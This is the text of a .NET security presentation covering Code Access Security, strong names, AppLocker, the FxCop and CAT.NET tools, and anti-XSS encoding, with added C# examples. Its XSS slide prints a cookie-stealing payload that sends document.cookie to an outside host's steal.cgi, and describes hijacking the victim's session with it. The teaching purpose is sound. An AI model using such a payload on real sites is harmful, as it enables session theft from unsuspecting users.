.NET Code security including 4.0 & Tools Jon C. Arce


Agenda
- Available Tools
- .NET Code Access Security
- FxCop
- CAT.NET
- .NET Framework Security Features
- Code Access Security
- Role-Based Security
- Cryptography
- Securing ASP.NET Web Applications
- Securing ASP.NET Web Services

.NET Code Access Security (CAS) Policy
Code Access Security (CAS) is the .NET Common Language Runtime (CLR) mechanism for maintaining security based on the identity of code. You need to sign the code to add external security configuration to the application.

Strong-Named Assemblies
Strong names are:
- Unique identifiers (containing a public key)
- Used to digitally sign assemblies
Strong-named assemblies:
- Prevent tampering
- Confirm the identity of the assembly's publisher
- Allow side-by-side components

    sn -k MyFullKey.snk

Evidence-Based Security
Evidence:
- Is assessed when an assembly is loaded
- Is used to determine the permissions for the assembly
- Can include the assembly's strong name information, URL, zone and Authenticode signature

Security Policies (up to .NET 2.0)
Security Entity: Description
- Policy: Is set by administrators. Is enforced at runtime. Simplifies administration. Contains permissions. Contains code groups.
- Code Group: Associates similar components. Is evidence based. Is linked to permission set(s).
- Permission Set: Is a set of granted permissions.

Permission Sets

Types of Security Checks
Imperative security checks:
- Create Permission objects
- Call Permission methods
Declarative security checks:
- Use Permission attributes
- Apply to methods or classes
Overriding security checks:
- Use the Assert method
- Prevent the stack walk

Security Check Stack Walks
1. An assembly requests access to a method in your assembly
2. Your assembly passes the request to a .NET Framework assembly
3. The security system ensures that all callers in the stack have the required permissions
4. The security system grants access or throws an exception
[Figure: call stack (YourAssembly, SomeAssembly, .NET Framework assembly) and the security system. Labels: Call to ReadFile; Grant: Execute; Grant: ReadFile; Permission Demand; Grant access?; Security exception; Access denied.]
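The three kinds of check and the stack walk described above, as an added example that is not part of the original slides. It assumes a fully trusted .NET Framework 4.x console application; the class name, method names and file paths are constructed for illustration. `PermitOnly` in `Main` stands in for a less trusted caller, so both demands are refused when the walk reaches that frame, while the call routed through `Assert` is allowed because the walk stops at the asserting frame.

```csharp
using System;
using System.Runtime.CompilerServices;
using System.Security;
using System.Security.Permissions;

static class StackWalkDemo
{
    // Constructed sample paths; FileIOPermission only needs them to be absolute.
    const string PublicDir = @"C:\Demo\public";
    const string SecretFile = @"C:\Demo\secret\keys.txt";

    // Imperative check: create a permission object and call Demand().
    // The stack walk then examines the callers above this method.
    [MethodImpl(MethodImplOptions.NoInlining)]
    static void ImperativeRead()
    {
        new FileIOPermission(FileIOPermissionAccess.Read, SecretFile).Demand();
    }

    // Declarative check: the same demand expressed as an attribute.
    [FileIOPermission(SecurityAction.Demand, Read = SecretFile)]
    [MethodImpl(MethodImplOptions.NoInlining)]
    static void DeclarativeRead() { }

    // Override: Assert() stops the walk at this frame, so callers above it
    // are never checked. The asserting assembly must hold the permission itself.
    [MethodImpl(MethodImplOptions.NoInlining)]
    static void AssertingWrapper()
    {
        new FileIOPermission(FileIOPermissionAccess.Read, SecretFile).Assert();
        try { ImperativeRead(); }
        finally { CodeAccessPermission.RevertAssert(); }
    }

    static string Try(Action call)
    {
        try { call(); return "granted"; }
        catch (SecurityException) { return "SecurityException"; }
    }

    static void Main()
    {
        // Stand-in for a less trusted caller: this frame may only read PublicDir.
        new FileIOPermission(FileIOPermissionAccess.Read, PublicDir).PermitOnly();
        Console.WriteLine("imperative:  " + Try(ImperativeRead));
        Console.WriteLine("declarative: " + Try(DeclarativeRead));
        Console.WriteLine("via Assert:  " + Try(AssertingWrapper));
    }
}
```

The `Assert` path is the one to review most carefully in real code: any caller, however restricted, reaches the protected resource through the asserting method.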

Permission Requests
- Used by developers to state required permissions
- Implemented by attributes
- Prevents an assembly from loading when minimum permissions are not available

    // I will only run if I can call unmanaged code
    [assembly: SecurityPermission(SecurityAction.RequestMinimum, UnmanagedCode = true)]

Create a code group (Control Panel)

Specify Membership Condition

Select a permission set

Naming the permission set

Assign permission sets

Setting File I/O permissions

Completing Code Group Creation

Security Policy in the v4 CLR
In previous releases of the .NET Framework, CAS policy applied to all assemblies loaded into an application. The major areas that are seeing updates with the v4 CLR are:
- Security policy
- Security transparency
- APTCA (AllowPartiallyTrustedCallersAttribute)
- Evidence
- AppDomain Managers

Sandboxing Privileged Code
- Partial Trust Web Application: <trust level="Medium" originUri=""/>
- Sandboxed Code
- Wrapper Assembly: Permissions Demanded then Asserted; AllowPartiallyTrustedCallers attribute added; Assembly installed into the global assembly cache
- Resource Access
- Secured Resource

Evidence Types
Evidence: Description
- Application directory: The application's installation directory.
- Hash: Cryptographic hash such as SHA1.
- Publisher: Software publisher signature; that is, the Authenticode signer of the code.
- Site: Site of origin, such as
- Strong name: Cryptographically strong name of the assembly.
- URL: URL of origin.
- Zone: Origin such as Internet Zone.

AppDomain Managers
In .NET, the basic unit of execution is NOT the process; rather, it is the Application Domain. With AppDomains, multiple applications can run in the same process, thereby sharing the .NET runtime libraries. The HostSecurityManager class applies policy and permissions. This technique determines the security for the entire AppDomain at once.

Software Restriction Policy
You can use software restriction policies to identify software and to control its ability to run on your local computer, organizational unit, domain, or site.
- Control the ability of software to run on your system.
- Permit users to run only specific files on multiuser computers.
- Control whether software restriction policies affect all users or just certain users on a computer.
- Prevent an application from running (for example, a virus).

New Software Restriction Policies

1. Sign the application

2. Set the publisher (Publish -> Options)

Windows Application Locker
AppLocker is a new feature in Windows 7 and Windows Server 2008 R2 that allows you to specify which users or groups can run particular applications in your organization, based on unique identities of files. If you use AppLocker, you can create rules to allow or deny applications from running, covering:
- executable files (.exe and .com)
- scripts (.js, .ps1, .vbs, .cmd, and .bat)
- Windows Installer files (.msi and .msp)
- DLL files (.dll and .ocx)

Isolated Storage
- Provides a virtual file system
- Allows quotas
- Implements file system isolation based on application identity and user identity

    IsolatedStorageFile isoStore = IsolatedStorageFile.GetUserStoreForAssembly();

TOOLS TO HELP WITH SECURITY

FxCop
FxCop is a code analysis tool that checks .NET managed code assemblies for conformance to the Microsoft .NET Framework Design Guidelines. It inspects assemblies for more than 200 defects in the following areas:
- Library design
- Globalization
- Naming conventions
- Performance
- Interoperability and portability
- Security
- Usage

FxCop demo

Microsoft Code Analysis Tool .NET (CAT.NET)
CAT.NET is a static code analysis tool like FxCop, but specially built for managed code and with a strong focus on security vulnerabilities. CAT.NET scans managed code for specific security vulnerabilities such as:
- SQL injection
- LDAP injection
- Cross Site Scripting
- XPATH injection
and many other categories of vulnerabilities.

CAT.NET demo

Cross Site Scripting
XSS stands for Cross Site Scripting. An XSS attack is when an attacker manages to inject JavaScript code (or sometimes other code) into a website, causing it to execute the code. For example, an attacker makes a specially crafted link and sends it to an unsuspecting victim; when the victim clicks the link, a piece of JavaScript code is executed that sends the victim's cookie away to a CGI script. Cross-site scripting carried out on websites accounted for roughly 80% of all documented security vulnerabilities as of 2007.

XSS Attack!
Send the victim and , with the following HTML:
document.location.replace(' eewebhost.com/ph33r/steal.cgi?'+document.cookie); ">Check this Article Out!
The user would of course click the link and be led to the CNN news article, but at the same time the attacker would have been able to direct the user towards his specially crafted URL; he now has the user's cookie. Using the Firefox cookie editor, the attacker copies and pastes the victim's cookie and uses it for himself.

Microsoft Anti-Cross Site Scripting Library V3.0
The Microsoft Anti-Cross Site Scripting Library V3.0 (Anti-XSS V3.0) is an encoding library designed to help developers protect their ASP.NET web-based applications from XSS attacks. It differs from most encoding libraries in that it uses the white-listing technique -- sometimes referred to as the principle of inclusions -- to provide protection against XSS attacks.
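The white-listing technique described above, as an added example that is not the Anti-XSS library's own code. The class name, the safe character set and the two sample inputs are assumptions constructed for illustration; the deny-list filter is included only to show what an allow-list encoder catches that a pattern filter misses.

```csharp
using System;
using System.Text;

static class AllowListEncodingDemo
{
    // Assumed safe set for this example: letters, digits and a few
    // punctuation characters. Everything else is encoded.
    static bool IsSafe(int cp)
    {
        return (cp >= 'a' && cp <= 'z') || (cp >= 'A' && cp <= 'Z') ||
               (cp >= '0' && cp <= '9') ||
               cp == ' ' || cp == '.' || cp == ',' || cp == '-' || cp == '_';
    }

    // Allow-list (white-list) encoding for HTML element and attribute values:
    // any code point outside the safe set becomes a numeric entity.
    public static string HtmlEncode(string input)
    {
        if (string.IsNullOrEmpty(input)) return string.Empty;
        var sb = new StringBuilder(input.Length * 2);
        for (int i = 0; i < input.Length; i++)
        {
            int cp = input[i];
            if (char.IsSurrogatePair(input, i))
                cp = char.ConvertToUtf32(input, i++); // also skips the low surrogate
            else if (char.IsSurrogate(input[i]))
                cp = 0xFFFD; // lone surrogate: emit the replacement character
            if (IsSafe(cp)) sb.Append((char)cp);
            else sb.Append("&#").Append(cp).Append(';');
        }
        return sb.ToString();
    }

    // Deny-list filter for comparison: strips only the pattern it knows about.
    public static string DenyListFilter(string input)
    {
        return input.Replace("<script>", "").Replace("</script>", "");
    }

    static void Main()
    {
        // Constructed inputs: a script element and an attribute breakout.
        string[] samples = { "<script>alert(1)</script>", "x\" onmouseover=\"alert(1)" };
        foreach (string s in samples)
        {
            Console.WriteLine("deny-list : " + DenyListFilter(s));
            Console.WriteLine("allow-list: " + HtmlEncode(s));
        }
    }
}
```

The second sample passes through the deny-list filter unchanged, while the allow-list encoder turns its quotes and equals signs into numeric entities without needing to know that input shape in advance.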

Session Summary
- .NET Framework Security Features
- Code Access Security
- Role-Based Security
- Cryptography
- Securing ASP.NET Web Applications
- Securing ASP.NET Web Services

Next Steps
1. Stay informed about security
- Sign up for security bulletins:
- Get the latest Microsoft security guidance:
2. Get additional security training
- Find online and in-person training seminars:
- Find a local CTEC for hands-on training:

For More Information
- Microsoft Security Site (all audiences)
- MSDN Security Site (developers)
- TechNet Security Site (IT professionals)

Questions and Answers